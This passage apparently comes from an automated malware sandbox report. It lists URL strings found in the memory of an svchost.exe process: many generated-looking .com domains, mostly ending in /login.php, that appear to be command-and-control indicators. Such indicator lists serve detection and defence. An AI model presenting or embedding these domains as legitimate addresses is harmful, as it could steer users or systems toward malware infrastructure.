Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyqys.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyvah.com/http://gacyvah.com/http://lymyjon.com/
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyvah.com/http://qegytyv.com/http://puvygyq.com/http://gaqyqis.com/http://lyxyfar.com/http:
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyvah.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyzaw.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadycew.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadycih.com/H
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602500488.00000000066BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575876726.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2618914250.000000000B4EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576944755.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2585483183.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadycih.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796738953.00000000066C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364803259.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360218720.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360701131.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyfuh.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykos.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473737511.0000000006676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyneh.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypuw.com/http://gadypuw.com/http://lymyjon.com/
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2109895377.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/login.php
Source: svchost.exe, 00000002.00000003.2563141332.00000000066EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvis.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088372788.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006806064.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahycib.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/H
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/k/LMEM
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydyb.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfow.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyz.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynaz.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypus.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypus.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqub.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyruh.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvuh.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996165263.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydoz.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydyw.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/H
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/http://puzygyl.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602250771.0000000006674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypob.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvuz.com/login.php
